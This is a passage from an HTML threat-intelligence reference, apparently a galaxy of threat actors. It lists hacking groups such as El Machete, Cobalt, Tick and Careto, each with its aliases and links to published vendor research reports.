<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://files.shareholder.com/downloads/AMDA-254Q5F/0x0x938351/665BA6A3-9573-486C-B96F-80FA35759E8C/FEYE_rpt-mtrends-2017_FINAL2.pdf">http://files.shareholder.com/downloads/AMDA-254Q5F/0x0x938351/665BA6A3-9573-486C-B96F-80FA35759E8C/FEYE_rpt-mtrends-2017_FINAL2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_el_machete"><a class="anchor" href="#_el_machete"></a><a class="link" href="#_el_machete">El Machete</a></h3>
<div class="paragraph">
<p>El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. Weve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2474. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/66108/el-machete/">https://securelist.com/blog/research/66108/el-machete/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html">https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobalt"><a class="anchor" href="#_cobalt"></a><a class="link" href="#_cobalt">Cobalt</a></h3>
<div class="paragraph">
<p>A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.</p>
</div>
<div class="paragraph">
<p>Cobalt is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cobalt group</p>
</li>
<li>
<p>Cobalt gang</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2475. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/">https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ta459"><a class="anchor" href="#_ta459"></a><a class="link" href="#_ta459">TA459</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2476. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts#.WS3IBVFV4no.twitter">https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts#.WS3IBVFV4no.twitter</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_berkut"><a class="anchor" href="#_cyber_berkut"></a><a class="link" href="#_cyber_berkut">Cyber Berkut</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2477. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/" class="bare">https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/</a><mark>.V-wnrubaeEU.twitter[<a href="https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/" class="bare">https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/</a></mark>.V-wnrubaeEU.twitter]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tonto_team"><a class="anchor" href="#_tonto_team"></a><a class="link" href="#_tonto_team">Tonto Team</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2478. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403?emailToken=JRrydPtyYnqTg9EyZsw31FwuZ7JNEOKCXF7LaW/HM1DLsjnUp6e6wLgph560pnmiTAN/5ssf7moyADPQj2p2Gc+YkL1yi0zhIiUM9M6aj1HTYQ==">https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403?emailToken=JRrydPtyYnqTg9EyZsw31FwuZ7JNEOKCXF7LaW/HM1DLsjnUp6e6wLgph560pnmiTAN/5ssf7moyADPQj2p2Gc+YkL1yi0zhIiUM9M6aj1HTYQ==</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/">https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_danti"><a class="anchor" href="#_danti"></a><a class="link" href="#_danti">Danti</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2479. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/">https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt5"><a class="anchor" href="#_apt5"></a><a class="link" href="#_apt5">APT5</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2480. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/current-threats/apt-groups.html">https://www.fireeye.com/current-threats/apt-groups.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_22"><a class="anchor" href="#_apt_22"></a><a class="link" href="#_apt_22">APT 22</a></h3>
<div class="paragraph">
<p>APT 22 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT22</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2481. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild">http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tick"><a class="anchor" href="#_tick"></a><a class="link" href="#_tick">Tick</a></h3>
<div class="paragraph">
<p>Tick is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Bronze Butler</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2482. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan">https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.jp/resources/rp-bronze-butler">https://www.secureworks.jp/resources/rp-bronze-butler</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html">http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_26"><a class="anchor" href="#_apt_26"></a><a class="link" href="#_apt_26">APT 26</a></h3>
<div class="paragraph">
<p>APT 26 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT26</p>
</li>
<li>
<p>Hippo Team</p>
</li>
<li>
<p>JerseyMikes</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_sabre_panda"><a class="anchor" href="#_sabre_panda"></a><a class="link" href="#_sabre_panda">Sabre Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2483. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_big_panda"><a class="anchor" href="#_big_panda"></a><a class="link" href="#_big_panda">Big Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2484. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?">http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poisonous_panda"><a class="anchor" href="#_poisonous_panda"></a><a class="link" href="#_poisonous_panda">Poisonous Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2485. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf">http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghost_jackal"><a class="anchor" href="#_ghost_jackal"></a><a class="link" href="#_ghost_jackal">Ghost Jackal</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2486. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_temp_hermit"><a class="anchor" href="#_temp_hermit"></a><a class="link" href="#_temp_hermit">TEMP.Hermit</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2487. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/">https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mofang"><a class="anchor" href="#_mofang"></a><a class="link" href="#_mofang">Mofang</a></h3>
<div class="paragraph">
<p>Mofang is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Superman</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2488. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/">https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/china-superman-apt/">https://www.threatconnect.com/china-superman-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_copykittens"><a class="anchor" href="#_copykittens"></a><a class="link" href="#_copykittens">CopyKittens</a></h3>
<div class="paragraph">
<p>CopyKittens is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Slayer Kitten</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2489. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf">https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/">https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/copykitten-jpost/">http://www.clearskysec.com/copykitten-jpost/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/tulip/">http://www.clearskysec.com/tulip/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_evilpost"><a class="anchor" href="#_evilpost"></a><a class="link" href="#_evilpost">EvilPost</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2490. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_svcmondr"><a class="anchor" href="#_svcmondr"></a><a class="link" href="#_svcmondr">SVCMONDR</a></h3>
<div class="paragraph">
<p>The referenced link links this group to Temper Panda</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2491. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/">https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_panda"><a class="anchor" href="#_test_panda"></a><a class="link" href="#_test_panda">Test Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2492. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_madi"><a class="anchor" href="#_madi"></a><a class="link" href="#_madi">Madi</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2493. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/33693/the-madi-campaign-part-i-5/">https://securelist.com/blog/incidents/33693/the-madi-campaign-part-i-5/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/33701/the-madi-campaign-part-ii-53/">https://securelist.com/blog/incidents/33701/the-madi-campaign-part-ii-53/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_electric_panda"><a class="anchor" href="#_electric_panda"></a><a class="link" href="#_electric_panda">Electric Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2494. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_maverick_panda"><a class="anchor" href="#_maverick_panda"></a><a class="link" href="#_maverick_panda">Maverick Panda</a></h3>
<div class="paragraph">
<p>Maverick Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PLA Navy</p>
</li>
<li>
<p>Sykipot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2495. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments">https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/">http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919">https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kimsuki"><a class="anchor" href="#_kimsuki"></a><a class="link" href="#_kimsuki">Kimsuki</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2496. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securelist.com/analysis/57915/the-kimsuky-operation-a-north-korean-apt/">http://securelist.com/analysis/57915/the-kimsuky-operation-a-north-korean-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snake_wine"><a class="anchor" href="#_snake_wine"></a><a class="link" href="#_snake_wine">Snake Wine</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2497. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html">https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_careto"><a class="anchor" href="#_careto"></a><a class="link" href="#_careto">Careto</a></h3>
<div class="paragraph">
<p>Careto is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>The Mask</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2498. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/58254/the-caretomask-apt-frequently-asked-questions/">https://securelist.com/blog/research/58254/the-caretomask-apt-frequently-asked-questions/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gibberish_panda"><a class="anchor" href="#_gibberish_panda"></a><a class="link" href="#_gibberish_panda">Gibberish Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2499. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oniondog"><a class="anchor" href="#_oniondog"></a><a class="link" href="#_oniondog">OnionDog</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2500. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml">http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clever_kitten"><a class="anchor" href="#_clever_kitten"></a><a class="link" href="#_clever_kitten">Clever Kitten</a></h3>
<div class="paragraph">
<p>Clever Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Group 41</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2501. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-clever-kitten/">http://www.crowdstrike.com/blog/whois-clever-kitten/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_andromeda_spider"><a class="anchor" href="#_andromeda_spider"></a><a class="link" href="#_andromeda_spider">Andromeda Spider</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2502. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_caliphate_army"><a class="anchor" href="#_cyber_caliphate_army"></a><a class="link" href="#_cyber_caliphate_army">Cyber Caliphate Army</a></h3>
<div class="paragraph">
<p>Cyber Caliphate Army is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Islamic State Hacking Division</p>
</li>
<li>
<p>CCA</p>
</li>
<li>
<p>United Cyber Caliphate</p>
</li>
<li>
<p>UUC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2503. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division">https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ent.siteintelgroup.com/index.php?option=com_customproperties&amp;view=search&amp;task=tag&amp;bind_to_category=content:37&amp;tagId=697">https://ent.siteintelgroup.com/index.php?option=com_customproperties&amp;view=search&amp;task=tag&amp;bind_to_category=content:37&amp;tagId=697</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_magnetic_spider"><a class="anchor" href="#_magnetic_spider"></a><a class="link" href="#_magnetic_spider">Magnetic Spider</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2504. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_group_27"><a class="anchor" href="#_group_27"></a><a class="link" href="#_group_27">Group 27</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2505. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Pointed-Dagger.pdf">https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Pointed-Dagger.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_singing_spider"><a class="anchor" href="#_singing_spider"></a><a class="link" href="#_singing_spider">Singing Spider</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2506. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_fighters_of_izz_ad_din_al_qassam"><a class="anchor" href="#_cyber_fighters_of_izz_ad_din_al_qassam"></a><a class="link" href="#_cyber_fighters_of_izz_ad_din_al_qassam">Cyber fighters of Izz Ad-Din Al Qassam</a></h3>
<div class="paragraph">
<p>Cyber fighters of Izz Ad-Din Al Qassam is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fraternal Jackal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2507. Table References</caption>
<colgroup>
<col style="width: 100%;">
